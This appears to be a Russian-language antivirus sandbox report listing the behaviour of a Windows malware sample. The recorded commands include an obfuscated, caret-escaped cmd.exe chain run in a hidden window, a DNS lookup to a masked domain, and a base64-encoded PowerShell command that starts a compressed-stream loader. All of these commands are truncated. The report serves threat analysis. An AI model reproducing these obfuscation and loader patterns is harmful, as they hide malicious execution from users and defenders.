Техническая информация
- '<SYSTEM32>\cmd.exe' cBmQcIowzT iWBPmKVFhjwQKjwLMnCJ jXDkHHjTJYzI & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %cXBIVjvBnuwFVFv%=djLRGAnd&&set %inDtNVrFOSIRsf%=p&&set %CTLsKdbhk%=o^...
- DNS ASK gq###4qwd.com
- '<SYSTEM32>\cmd.exe' cBmQcIowzT iWBPmKVFhjwQKjwLMnCJ jXDkHHjTJYzI & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %cXBIVjvBnuwFVFv%=djLRGAnd&&set %inDtNVrFOSIRsf%=p&&set %CTLsKdbhk%=o^...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAAbgBlAFcALQBPAEIASgBlAGMAVAAgACAASQBvAC4AUwBUAFIAZQBBAE0AcgBlAGEARABFAHIAKAAgACgAIABuAGUAVwAtAE8AQgBKAGUAYwBUACAAcwB5AFMAVABlAE0ALgBpAE8ALgBDAE8AbQBwAHIAZQBTAFMAaQBvAE4ALgBEAEUAZgBsAE...